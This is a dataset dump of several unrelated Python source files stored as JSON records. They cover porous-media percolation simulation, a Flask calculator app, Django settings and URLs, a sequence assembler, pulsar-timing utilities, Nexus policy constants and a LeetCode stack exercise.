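# (Ps = self._net.Ps[Ps]). The same normalisation in isolation; np.arange
# stands in for the network's pore index list.
import numpy as np

Ps = np.array([False, True, False, True])  # boolean mask over four pores
all_pores = np.arange(Ps.size)             # stand-in for self._net.Ps
inlets = all_pores[Ps] if Ps.dtype == bool else Ps
assert inlets.tolist() == [1, 3]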
The list of pressures\r\n is logarithmically spaced between the lowest and highest throat\r\n entry pressures in the network.\r\n\r\n inv_points : array_like, optional\r\n A list of specific pressure point(s) to apply.\r\n\r\n \"\"\"\r\n if 'inlets' in kwargs.keys():\r\n logger.info('Inlets recieved, passing to set_inlets')\r\n self.set_inlets(pores=kwargs['inlets'])\r\n if 'outlets' in kwargs.keys():\r\n logger.info('Outlets recieved, passing to set_outlets')\r\n self.set_outlets(pores=kwargs['outlets'])\r\n self._AL = access_limited\r\n if inv_points is None:\r\n logger.info('Generating list of invasion pressures')\r\n min_p = sp.amin(self['throat.entry_pressure']) * 0.98 # nudge down\r\n max_p = sp.amax(self['throat.entry_pressure']) * 1.02 # bump up\r\n inv_points = sp.logspace(sp.log10(min_p),\r\n sp.log10(max_p),\r\n npts)\r\n\r\n self._npts = sp.size(inv_points)\r\n # Execute calculation\r\n self._do_outer_iteration_stage(inv_points)\r\n\r\n def _do_outer_iteration_stage(self, inv_points):\r\n # Generate curve from points\r\n for inv_val in inv_points:\r\n # Apply one applied pressure and determine invaded pores\r\n logger.info('Applying capillary pressure: ' + str(inv_val))\r\n self._do_one_inner_iteration(inv_val)\r\n\r\n # Find invasion sequence values (to correspond with IP algorithm)\r\n self['pore.inv_seq'] = sp.searchsorted(sp.unique(self['pore.inv_Pc']),\r\n self['pore.inv_Pc'])\r\n self['throat.inv_seq'] = sp.searchsorted(sp.unique(self['throat.inv_Pc']),\r\n self['throat.inv_Pc'])\r\n\r\n if self._trapping:\r\n self.evaluate_trapping(self['pore.outlets'])\r\n\r\n def _do_one_inner_iteration(self, inv_val):\r\n r\"\"\"\r\n Determine which throats are invaded at a given applied capillary\r\n pressure.\r\n\r\n \"\"\"\r\n # Generate a tlist containing boolean values for throat state\r\n Tinvaded = self['throat.entry_pressure'] <= inv_val\r\n # Find all pores that can be invaded at specified pressure\r\n [pclusters, tclusters] = self._net.find_clusters2(mask=Tinvaded,\r\n t_labels=True)\r\n if self._AL:\r\n # Identify clusters connected to invasion sites\r\n inv_clusters = sp.unique(pclusters[self['pore.inlets']])\r\n else:\r\n # All clusters are invasion sites\r\n inv_clusters = pclusters\r\n inv_clusters = inv_clusters[inv_clusters >= 0]\r\n # Find pores on the invading clusters\r\n pmask = np.in1d(pclusters, inv_clusters)\r\n # Store current applied pressure in newly invaded pores\r\n pinds = (self['pore.inv_Pc'] == sp.inf) * (pmask)\r\n self['pore.inv_Pc'][pinds] = inv_val\r\n # Find throats on the invading clusters\r\n tmask = np.in1d(tclusters, inv_clusters)\r\n # Store current applied pressure in newly invaded throats\r\n tinds = (self['throat.inv_Pc'] == sp.inf) * (tmask)\r\n self['throat.inv_Pc'][tinds] = inv_val\r\n # Store total network saturation\r\n tsat = sp.sum(self._net['throat.volume'][self['throat.inv_Pc'] <= inv_val])\r\n psat = sp.sum(self._net['pore.volume'][self['pore.inv_Pc'] <= inv_val])\r\n total = sp.sum(self._net['throat.volume']) + sp.sum(self._net['pore.volume'])\r\n self['pore.inv_sat'][pinds] = (tsat + psat)/total\r\n self['throat.inv_sat'][tinds] = (tsat + psat)/total\r\n\r\n def evaluate_trapping(self, p_outlets):\r\n r\"\"\"\r\n Finds trapped pores and throats after a full ordinary\r\n percolation simulation has been run.\r\n\r\n Parameters\r\n ----------\r\n p_outlets : array_like\r\n A list of pores that define the wetting phase outlets.\r\n Disconnection from these outlets results in trapping.\r\n\r\n Returns\r\n -------\r\n It creates 
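# The inv_seq assignment above uses a dense-ranking idiom:
# searchsorted(unique(x), x) maps every value to the index of that value in
# the sorted set of distinct values. A standalone illustration with numpy
# (the scipy `sp` alias above exposes the same functions):
import numpy as np

pressures = np.array([3.0, 1.0, 3.0, 2.0, np.inf])
ranks = np.searchsorted(np.unique(pressures), pressures)
# unique -> [1., 2., 3., inf], so equal pressures share one rank:
assert ranks.tolist() == [2, 0, 2, 1, 3]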
arrays called ``pore.trapped`` and ``throat.trapped``, but\r\n also adjusts the ``pore.inv_Pc`` and ``throat.inv_Pc`` arrays to set\r\n trapped locations to have infinite invasion pressure.\r\n\r\n \"\"\"\r\n self['pore.trapped'] = sp.zeros([self.Np, ], dtype=float)\r\n self['throat.trapped'] = sp.zeros([self.Nt, ], dtype=float)\r\n try:\r\n # Get points used in OP\r\n inv_points = sp.unique(self['pore.inv_Pc'])\r\n except:\r\n raise Exception('Orindary percolation has not been run!')\r\n tind = self._net.throats()\r\n conns = self._net.find_connected_pores(tind)\r\n for inv_val in inv_points[0:-1]:\r\n # Find clusters of defender pores\r\n Pinvaded = self['pore.inv_Pc'] <= inv_val\r\n Cstate = sp.sum(Pinvaded[conns], axis=1)\r\n Tinvaded = self['throat.inv_Pc'] <= inv_val\r\n # 0 = all open, 1=1 pore filled,\r\n # 2=2 pores filled 3=2 pores + 1 throat filled\r\n Cstate = Cstate + Tinvaded\r\n clusters = self._net.find_clusters(Cstate == 0)\r\n # Clean up clusters (invaded = -1, defended >=0)\r\n clusters = clusters * (~Pinvaded) - (Pinvaded)\r\n # Identify clusters connected to outlet sites\r\n out_clusters = sp.unique(clusters[p_outlets])\r\n trapped_pores = ~sp.in1d(clusters, out_clusters)\r\n trapped_pores[Pinvaded] = False\r\n if sum(trapped_pores) > 0:\r\n inds = (self['pore.trapped'] == 0) * trapped_pores\r\n self['pore.trapped'][inds] = inv_val\r\n trapped_throats = self._net.find_neighbor_throats(trapped_pores)\r\n trapped_throat_array = np.asarray([False] * len(Cstate))\r\n trapped_throat_array[trapped_throats] = True\r\n inds = (self['throat.trapped'] == 0) * trapped_throat_array\r\n self['throat.trapped'][inds] = inv_val\r\n inds = (self['throat.trapped'] == 0) * (Cstate == 2)\r\n self['throat.trapped'][inds] = inv_val\r\n self['pore.trapped'][self['pore.trapped'] > 0] = sp.inf\r\n self['throat.trapped'][self['throat.trapped'] > 0] = sp.inf\r\n self['pore.inv_Pc'][self['pore.trapped'] > 0] = sp.inf\r\n self['throat.inv_Pc'][self['throat.trapped'] > 0] = sp.inf\r\n\r\n def evaluate_late_pore_filling(self, Pc, Swp_init=0.75, eta=3.0,\r\n wetting_phase=False):\r\n r\"\"\"\r\n Compute the volume fraction of the phase in each pore given an initial\r\n wetting phase fraction (Swp_init) and a growth exponent (eta)\r\n returns the fraction of the pore volume occupied by wetting or\r\n non-wetting phase.\r\n Assumes Non-wetting phase displaces wetting phase\r\n \"\"\"\r\n Swp = Swp_init*(self['pore.inv_Pc']/Pc)**eta\r\n Swp[self['pore.inv_Pc'] > Pc] = 1.0\r\n Snwp = 1-Swp\r\n if wetting_phase:\r\n return Swp\r\n else:\r\n return Snwp\r\n\r\n def return_results(self, Pc=0, seq=None, sat=None, occupancy='occupancy'):\r\n r\"\"\"\r\n Updates the occupancy status of invading and defending phases\r\n as determined by the OP algorithm\r\n\r\n \"\"\"\r\n p_inv = self['pore.inv_Pc']\r\n self._inv_phase['pore.inv_Pc'] = p_inv\r\n t_inv = self['throat.inv_Pc']\r\n self._inv_phase['throat.inv_Pc'] = t_inv\r\n # Apply invasion sequence values (to correspond with IP algorithm)\r\n p_seq = self['pore.inv_seq']\r\n self._inv_phase['pore.inv_seq'] = p_seq\r\n t_seq = self['throat.inv_seq']\r\n self._inv_phase['throat.inv_seq'] = t_seq\r\n # Apply saturation to pores and throats\r\n self._inv_phase['pore.inv_sat'] = self['pore.inv_sat']\r\n self._inv_phase['throat.inv_sat'] = self['throat.inv_sat']\r\n\r\n if sat is not None:\r\n p_inv = self['pore.inv_sat'] <= sat\r\n t_inv = self['throat.inv_sat'] <= sat\r\n # Apply occupancy to invading phase\r\n temp = sp.array(p_inv, dtype=sp.float_, ndmin=1)\r\n 
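# evaluate_trapping() above keeps pores whose cluster label is not connected
# to any outlet: ~sp.in1d(clusters, out_clusters). A miniature version of
# that mask:
import numpy as np

clusters = np.array([0, 0, 1, 2, 1])   # cluster label per pore
out_clusters = np.array([1])           # clusters that reach an outlet
trapped = ~np.in1d(clusters, out_clusters)
assert trapped.tolist() == [True, True, False, True, False]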
self._inv_phase['pore.' + occupancy] = temp\r\n temp = sp.array(t_inv, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['throat.' + occupancy] = temp\r\n # Apply occupancy to defending phase\r\n if self._def_phase is not None:\r\n temp = sp.array(~p_inv, dtype=sp.float_, ndmin=1)\r\n self._def_phase['pore.' + occupancy] = temp\r\n temp = sp.array(~t_inv, dtype=sp.float_, ndmin=1)\r\n self._def_phase['throat.' + occupancy] = temp\r\n elif seq is not None:\r\n p_seq = self['pore.inv_seq'] <= seq\r\n t_seq = self['throat.inv_seq'] <= seq\r\n # Apply occupancy to invading phase\r\n temp = sp.array(p_seq, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['pore.' + occupancy] = temp\r\n temp = sp.array(t_seq, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['throat.' + occupancy] = temp\r\n # Apply occupancy to defending phase\r\n if self._def_phase is not None:\r\n temp = sp.array(~p_seq, dtype=sp.float_, ndmin=1)\r\n self._def_phase['pore.' + occupancy] = temp\r\n temp = sp.array(~t_seq, dtype=sp.float_, ndmin=1)\r\n self._def_phase['throat.' + occupancy] = temp\r\n else:\r\n p_inv = self['pore.inv_Pc'] <= Pc\r\n t_inv = self['throat.inv_Pc'] <= Pc\r\n # Apply occupancy to invading phase\r\n temp = sp.array(p_inv, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['pore.' + occupancy] = temp\r\n temp = sp.array(t_inv, dtype=sp.float_, ndmin=1)\r\n self._inv_phase['throat.' + occupancy] = temp\r\n # Apply occupancy to defending phase\r\n if self._def_phase is not None:\r\n temp = sp.array(~p_inv, dtype=sp.float_, ndmin=1)\r\n self._def_phase['pore.' + occupancy] = temp\r\n temp = sp.array(~t_inv, dtype=sp.float_, ndmin=1)\r\n self._def_phase['throat.' + occupancy] = temp\r\n\r\n def plot_drainage_curve(self, pore_volume='volume', throat_volume='volume',\r\n pore_label='all', throat_label='all'):\r\n r\"\"\"\r\n Plot drainage capillary pressure curve\r\n \"\"\"\r\n try:\r\n PcPoints = sp.unique(self['pore.inv_Pc'])\r\n except:\r\n raise Exception('Cannot print drainage curve: ordinary percolation \\\r\n simulation has not been run')\r\n pores = self._net.pores(labels=pore_label)\r\n throats = self._net.throats(labels=throat_label)\r\n Snwp_t = sp.zeros_like(PcPoints)\r\n Snwp_p = sp.zeros_like(PcPoints)\r\n Snwp_all = sp.zeros_like(PcPoints)\r\n Pvol = self._net['pore.' + pore_volume]\r\n Tvol = self._net['throat.' 
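# The three Pc/seq/sat branches of return_results() repeat one pattern: cast
# a boolean mask to float and store it under '<element>.<occupancy>'. A
# sketch of the helper such a refactor would extract -- apply_occupancy and
# the plain-dict stand-in for a Phase object are illustrative, not OpenPNM API.
import numpy as np

def apply_occupancy(phase, mask, occupancy='occupancy', element='pore'):
    phase[element + '.' + occupancy] = np.array(mask, dtype=float, ndmin=1)

phase = {}
apply_occupancy(phase, np.array([True, False]))
assert phase['pore.occupancy'].tolist() == [1.0, 0.0]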
+ throat_volume]\r\n Pvol_tot = sp.sum(Pvol)\r\n Tvol_tot = sp.sum(Tvol)\r\n vol_tot = Pvol_tot + Tvol_tot\r\n for i in range(0, sp.size(PcPoints)):\r\n Pc = PcPoints[i]\r\n Snwp_p[i] = sp.sum(Pvol[self['pore.inv_Pc'][pores] <= Pc]) / vol_tot\r\n Snwp_t[i] = sp.sum(Tvol[self['throat.inv_Pc'][throats] <= Pc]) / vol_tot\r\n Snwp_all[i] = (sp.sum(Tvol[self['throat.inv_Pc'][throats] <= Pc]) +\r\n sp.sum(Pvol[self['pore.inv_Pc'][pores] <= Pc])) / vol_tot\r\n if sp.mean(self._inv_phase['pore.contact_angle']) < 90:\r\n Snwp_p = 1 - Snwp_p\r\n Snwp_t = 1 - Snwp_t\r\n Snwp_all = 1 - Snwp_all\r\n PcPoints *= -1\r\n fig = plt.figure()\r\n plt.plot(PcPoints, Snwp_all, 'g.-')\r\n plt.plot(PcPoints, Snwp_p, 'r.-')\r\n plt.plot(PcPoints, Snwp_t, 'b.-')\r\n r\"\"\"\r\n TODO: Add legend to distinguish the pore and throat curves\r\n \"\"\"\r\n return fig\r\n\r\n def plot_primary_drainage_curve(self, pore_volume='volume',\r\n throat_volume='volume', pore_label='all',\r\n throat_label='all'):\r\n r\"\"\"\r\n Plot the primary drainage curve as the capillary pressure on ordinate\r\n and total saturation of the wetting phase on the abscissa.\r\n This is the preffered style in the petroleum engineering\r\n \"\"\"\r\n try:\r\n PcPoints = sp.unique(self['pore.inv_Pc'])\r\n except:\r\n raise Exception('Cannot print drainage curve: ordinary percolation \\\r\n simulation has not been run')\r\n pores = self._net.pores(labels=pore_label)\r\n throats = self._net.throats(labels=throat_label)\r\n p_inv = self['pore.inv_Pc']\r\n t_inv = self['throat.inv_Pc']\r\n Snwp_t = sp.zeros_like(PcPoints)\r\n Snwp_p = sp.zeros_like(PcPoints)\r\n Snwp_all = sp.zeros_like(PcPoints)\r\n Swp_all = sp.zeros_like(PcPoints)\r\n Pvol = self._net['pore.' + pore_volume]\r\n Tvol = self._net['throat.' + throat_volume]\r\n Pvol_tot = sp.sum(Pvol)\r\n Tvol_tot = sp.sum(Tvol)\r\n for i in range(0, sp.size(PcPoints)):\r\n Pc = PcPoints[i]\r\n Snwp_p[i] = sp.sum(Pvol[p_inv[pores] <= Pc]) / Pvol_tot\r\n Snwp_t[i] = sp.sum(Tvol[t_inv[throats] <= Pc]) / Tvol_tot\r\n Snwp_all[i] = (sp.sum(Tvol[t_inv[throats] <= Pc]) +\r\n sp.sum(Pvol[p_inv[pores] <= Pc])) / \\\r\n (Tvol_tot + Pvol_tot)\r\n Swp_all[i] = 1 - Snwp_all[i]\r\n fig = plt.figure()\r\n plt.plot(Swp_all, PcPoints, 'k.-')\r\n plt.xlim(xmin=0)\r\n plt.xlabel('Saturation of wetting phase')\r\n plt.ylabel('Capillary Pressure [Pa]')\r\n plt.title('Primay Drainage Curve')\r\n plt.grid(True)\r\n return fig\r\n","sub_path":"OpenPNM/Algorithms/__OrdinaryPercolation__.py","file_name":"__OrdinaryPercolation__.py","file_ext":"py","file_size_in_byte":18468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"460611267","text":"\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom flask import Flask, redirect, url_for, request, render_template,make_response\nfrom calculator.main import test\nimport subprocess\nfrom functools import wraps, update_wrapper\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.config[\"CACHE_TYPE\"] = \"null\"\n\ndef cleanLine(line):\n result_dict = {}\n result = line.replace(' ', '')\n result = result.split(',')\n for element in result:\n symbol, value = element.split('=')\n result_dict[symbol] = float(value)\n return result_dict\n@app.route('/input', methods = ['POST', 'GET'])\ndef calcExpr():\n if request.method == 'POST':\n expr = request.form['Expression']\n expr_range = request.form['Range']\n derivative_points = request.form['Point']\n calculation = 
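# cleanLine() above turns form input such as "x=1, y=2.5" into a
# symbol-to-float dict. A standalone copy with a quick check; the behaviour
# (spaces stripped, values coerced to float) mirrors the function in this file.
def clean_line(line):
    result = {}
    for element in line.replace(' ', '').split(','):
        symbol, value = element.split('=')
        result[symbol] = float(value)
    return result

assert clean_line('x=1, y=2.5') == {'x': 1.0, 'y': 2.5}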
request.form['Calculation']\n \n if expr_range == '': expr_range = '-1,1'\n if derivative_points == '': derivative_points = 'x=1,y=1'\n if calculation =='': calculation = 'x=1,y=1'\n \n derivative_points = cleanLine(derivative_points)\n calculation = cleanLine(calculation)\n expr_range = list(map(float,expr_range.split(',')))\n pics, canonicalization, partial_derivatives, domain, derivative_point, calculation_result = test(expr,expr_range,derivative_points,calculation)\n return render_template('image.html',\n pics = pics,\n canonicalization = canonicalization,\n input = expr,\n result = calculation_result,\n partial_derivatives = partial_derivatives,\n domain = domain,\n derivative_point = derivative_point)\n\n\n@app.route(\"/\")\ndef main():\n return render_template('index.html')\nif __name__ == '__main__':\n app.run(debug = True)\n #app.run()\n\n\n","sub_path":"app/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"348818843","text":"import raven\n\nfrom .base import *\n\n\nDEBUG = os.environ.get('DEBUG', False)\nCURRENT_HOST = os.environ.get('CURRENT_HOST', '')\nALLOWED_HOSTS = [CURRENT_HOST]\n\nREDIS_HOST = os.environ.get('REDIS_HOST', '127.0.0.1')\nREDIS_PATH = f'redis://{REDIS_HOST}:{REDIS_PORT}/1'\nCELERY_BROKER_URL = REDIS_PATH\nCELERY_RESULT_BACKEND = REDIS_PATH\n\nCACHES['default']['LOCATION'] = [REDIS_PATH, ]\n\n","sub_path":"config/settings/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"551448524","text":"import copy\nimport itertools\n\ndef connect(a, b, l):\n if a[-l:] == b[:l]:\n return a + b[l:], a[-l:]\n elif b[-l:] == a[:l]:\n return b + a[l:], b[-l:]\n else:\n return '',''\n\ndef assemble(edges, nodes, want):\n #while len(nodes) > want and len(edges) > 0:\n while len(nodes) > want:\n for i,j in itertools.combinations(nodes,2):\n contig, overlap = connect(i,j,2)\n if overlap:\n nodes.remove(i)\n nodes.remove(j)\n edges.remove(overlap)\n nodes.append(contig)\n print('[contig]:',contig)\n break\n print('[nodes ]:', nodes)\n return\n\ndef main():\n di = [['Ala','Leu'],['Arg','Gly'],['Asp','Glu'],['Cys','Gly'],\n ['Cys','Gly'],['Glu','Ala'],['Glu','Arg'],['Glu','His'],\n ['Gly','Glu'],['Gly','Phe'],['His','Leu'],['His','Leu'],\n ['Leu','Cys'],['Leu','Val'],['Leu','Val'],['Lys','Ala'],\n ['Phe','Val'],['Ser','His'],['Thr','Pro'],['Tyr','Leu'],\n ['Val','Asp'],['Val','Cys'],['Val','Glu']]\n\n tri = [['Glu','Arg','Gly'],['Glu','His','Leu'],['Gly','Glu','Arg'],\n ['His','Leu','Cys'],['Leu','Cys','Gly'],['Leu','Val','Cys'],\n ['Leu','Val','Glu'],['Phe','Val','Asp'],['Pro','Lys','Ala'],\n ['Ser','His','Leu'],['Tyr','Leu','Val'],['Val','Asp','Glu'],\n ['Val','Cys','Gly'],['Val','Glu','Ala']]\n\n assemble(['bc','cd'],['abc', 'bcd', 'cde'], 1)\n assemble(['cd','bc'],['bcd', 'abc', 'cde'], 1)\n assemble(['cd','bc','ij','jk'],['bcd', 'abc', 'cde','hij','ijk','jkl'], 2)\n #assemble(di, tri, 2)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"assemble_insulin.py","file_name":"assemble_insulin.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"296925077","text":"#! 
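# connect(a, b, l) above merges two fragments when one's length-l suffix
# equals the other's length-l prefix, returning (contig, overlap). The checks
# below make the merge direction explicit:
def connect(a, b, l):
    if a[-l:] == b[:l]:
        return a + b[l:], a[-l:]
    elif b[-l:] == a[:l]:
        return b + a[l:], b[-l:]
    return '', ''

assert connect('abc', 'bcd', 2) == ('abcd', 'bc')  # suffix of a == prefix of b
assert connect('bcd', 'abc', 2) == ('abcd', 'bc')  # roles reversed, same contig
assert connect('abc', 'xyz', 2) == ('', '')        # no overlap -> empty result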
python3\nfrom array import array\n\n__author__ = 'Lucas'\n\nbase_set = {1, 2, 3, 4, 5}\nprint(base_set)\nbase_set = {5, 4, 3, 2, 1}\nprint(base_set)\n\nmy_list = ['Lucas', 'Nirvana', 'Kate', 'Jorge'] * 3\nprint(my_list)\nmy_set = set(my_list)\nprint(my_set)\n","sub_path":"S1/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"361930833","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport numpy as np\n\n__all__ = ['create_design_matrix',\n ]\n\nday_sec = 24*3600\nyr_sec = 365.25*24*3600\n\ndef create_design_matrix(toas, RADEC=False, PROPER=False, PX=False):\n \"\"\"\n Return designmatrix for quadratic spindown model + optional\n astrometric parameters\n\n Parameters\n ----------\n toas : array\n TOA measurements [s]\n\n RADEC : bool, optional\n Includes RA/DEC fitting.\n\n PROPER : bool, optional\n Includes proper motion fitting.\n\n PX : bool, optional\n Includes parallax fitting.\n\n Returns\n -------\n M : array\n Design matrix for quadratic spin down + optional astrometry fit.\n\n \"\"\"\n model = ['QSD', 'QSD', 'QSD']\n if RADEC:\n model.append('RA')\n model.append('DEC')\n if PROPER:\n model.append('PRA')\n model.append('PDEC')\n if PX:\n model.append('PX')\n\n ndim = len(model)\n designmatrix = np.zeros((len(toas), ndim))\n\n for ii in range(ndim):\n if model[ii] == 'QSD': #quadratic spin down fit\n designmatrix[:,ii] = toas**(ii) #Cute\n if model[ii] == 'RA':\n designmatrix[:,ii] = np.sin(2*np.pi/yr_sec*toas)\n if model[ii] == 'DEC':\n designmatrix[:,ii] = np.cos(2*np.pi/yr_sec*toas)\n if model[ii] == 'PRA':\n designmatrix[:,ii] = toas*np.sin(2*np.pi/yr_sec*toas)\n if model[ii] == 'PDEC':\n designmatrix[:,ii] = toas*np.cos(2*np.pi/yr_sec*toas)\n if model[ii] == 'PX':\n designmatrix[:,ii] = np.cos(4*np.pi/yr_sec*toas)\n\n return designmatrix\n","sub_path":"hasasia/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"43933143","text":"# Relevant javadocs\n# LayoutPolicy, VersionPolicy\n# http://search.maven.org/remotecontent?filepath=org/sonatype/nexus/plugins/nexus-repository-maven/3.12.1-01/nexus-repository-maven-3.12.1-01-javadoc.jar\n# WritePolicy\n# http://search.maven.org/remotecontent?filepath=org/sonatype/nexus/nexus-repository/3.0.2-02/nexus-repository-3.0.2-02-javadoc.jar\n\nPOLICY_IMPORTS = {\n 'layout': ['org.sonatype.nexus.repository.maven.LayoutPolicy'],\n 'version': ['org.sonatype.nexus.repository.maven.VersionPolicy'],\n 'write': ['org.sonatype.nexus.repository.storage.WritePolicy'],\n}\n\nPOLICIES = {\n 'layout': {\n 'permissive': 'LayoutPolicy.PERMISSIVE',\n 'strict': 'LayoutPolicy.STRICT',\n },\n 'version': {\n 'release': 'VersionPolicy.RELEASE',\n 'snapshot': 'VersionPolicy.SNAPSHOT',\n 'mixed': 'VersionPolicy.MIXED',\n },\n 'write': {\n 'allow': 'WritePolicy.ALLOW',\n 'allow_once': 'WritePolicy.ALLOW_ONCE',\n 'deny': 'WritePolicy.DENY',\n },\n}\n","sub_path":"src/nexuscli/nexus_repository.py","file_name":"nexus_repository.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"451717460","text":"\"\"\"\n@link:\n\n [225. 
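# In create_design_matrix() above the quadratic spin-down columns come from
# toas**ii for ii = 0, 1, 2 -- a Vandermonde-style matrix. numpy builds the
# same three columns directly, which makes a handy cross-check:
import numpy as np

toas = np.array([0.0, 10.0, 20.0])
qsd = np.column_stack([toas ** i for i in range(3)])
assert np.allclose(qsd, np.vander(toas, 3, increasing=True))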
Implement Stack using Queues](https://leetcode.com/problems/implement-stack-using-queues/)\n\n@desc:\n\n Implement the following operations of a stack using queues.\n\n push(x) -- Push element x onto stack.\n pop() -- Removes the element on top of the stack.\n top() -- Get the top element.\n empty() -- Return whether the stack is empty.\n Notes:\n You must use only standard operations of a queue -- which means only push to back, peek/pop from front, size, and is empty operations are valid.\n Depending on your language, queue may not be supported natively. You may simulate a queue by using a list or deque (double-ended queue), as long as you use only standard operations of a queue.\n You may assume that all operations are valid (for example, no pop or top operations will be called on an empty stack).\n\n\"\"\"\n\n\nclass StackByTwoQueues(object):\n def __init__(self):\n \"\"\"\n use two queues to implement stack\n operations of queue as a list:\n - push: append(x)\n - pop: pop(0)\n - peek: [0]\n - size: len()\n - empty: not\n @Runtime: 40 ms\n @Reference: https://leetcode.com/discuss/46975/a-simple-c-solution\n initialize your data structure here.\n \"\"\"\n self.queue1, self.queue2 = [], []\n\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: nothing\n \"\"\"\n if self.queue1:\n self.queue1.append(x)\n else:\n self.queue2.append(x)\n\n def pop(self):\n \"\"\"\n :rtype: nothing\n \"\"\"\n if self.queue1:\n while len(self.queue1) > 1:\n self.queue2.append(self.queue1.pop(0))\n return self.queue1.pop(0)\n else:\n while len(self.queue2) > 1:\n self.queue1.append(self.queue2.pop(0))\n return self.queue2.pop(0)\n\n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n x = None\n if self.queue1:\n while len(self.queue1) > 1:\n self.queue2.append(self.queue1.pop(0))\n x = self.queue1.pop(0)\n self.queue2.append(x)\n else:\n while len(self.queue2) > 1:\n self.queue1.append(self.queue2.pop(0))\n x = self.queue2.pop(0)\n self.queue1.append(x)\n return x\n\n def empty(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n return (not self.queue1) and (not self.queue2)\n\n\nclass StackByOneQueue(object):\n def __init__(self):\n \"\"\"\n use one queue to implement stack\n operations of queue as a list:\n - push: append(x)\n - pop: pop(0)\n - peek: [0]\n - size: len()\n - empty: not\n @Runtime: 40 ms\n initialize your data structure here.\n \"\"\"\n self.queue = []\n\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: nothing\n \"\"\"\n self.queue.append(x)\n queue_size = len(self.queue)\n i = 0\n while i < queue_size - 1:\n self.queue.append(self.queue.pop(0))\n i += 1\n\n def pop(self):\n \"\"\"\n :rtype: nothing\n \"\"\"\n return self.queue.pop(0)\n\n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return self.queue[0]\n\n def empty(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n return not self.queue\n\nif __name__ == '__main__':\n # stack = StackByTwoQueues()\n stack = StackByOneQueue()\n stack.push(1)\n stack.push(2)\n stack.push(3)\n stack.push(4)\n stack.push(5)\n\n assert stack.pop() == 5\n assert stack.top() == 4\n stack.push(6)\n stack.push(7)\n assert stack.top() == 7\n assert stack.pop() == 7\n assert stack.empty() == False\n","sub_path":"leetcode/leetcode_e_225.py","file_name":"leetcode_e_225.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"620342770","text":"\"\"\"ebdjango URL Configuration\n\nThe `urlpatterns` list routes URLs to views. 
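# StackByOneQueue above rotates the queue by hand after every push so the
# newest element reaches the front. collections.deque has a built-in
# rotate(), giving the same O(n)-push stack more compactly (a sketch, not
# part of the original solution):
from collections import deque

class StackByDeque:
    def __init__(self):
        self.q = deque()

    def push(self, x):
        self.q.append(x)
        self.q.rotate(1)       # bring the new element to the front

    def pop(self):
        return self.q.popleft()

    def top(self):
        return self.q[0]

    def empty(self):
        return not self.q

s = StackByDeque()
for v in (1, 2, 3):
    s.push(v)
assert s.pop() == 3 and s.top() == 2 and not s.empty()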
For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom api.resources import *\n\nticket_resource = TicketResource()\nproject_resource = LdrprojectResource()\n\n#Admin Configuration\nadmin.site.site_header = settings.ADMIN_SITE_HEADER\n\n#original pattern\n#urlpatterns = [\n# url(r'^admin/', admin.site.urls),\n# url(r'^', include('helloworld.urls')), \n#] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^', include('portal.urls')),\n url(r'^up/', include('userapp.urls')),\n url(r'^accounts/', include('registration.backends.default.urls')),\n url(r'^helpdesk/', include('helpdesk.urls', namespace='helpdesk')),\n url(r'^project/', include('project.urls', namespace='project')),\n url(r'^api/', include(ticket_resource.urls)),\n url(r'^api/', include(project_resource.urls)),\n \n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"ebdjango/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"469909844","text":"from __future__ import print_function\nfrom stylelens_dataset.colors import Colors \nfrom pprint import pprint\nimport os\nimport string\nimport time\nimport tensorflow as tf\nimport urllib.request as urllib\n# import redis\n# from bluelens_log import Logging\n\napi_instance = 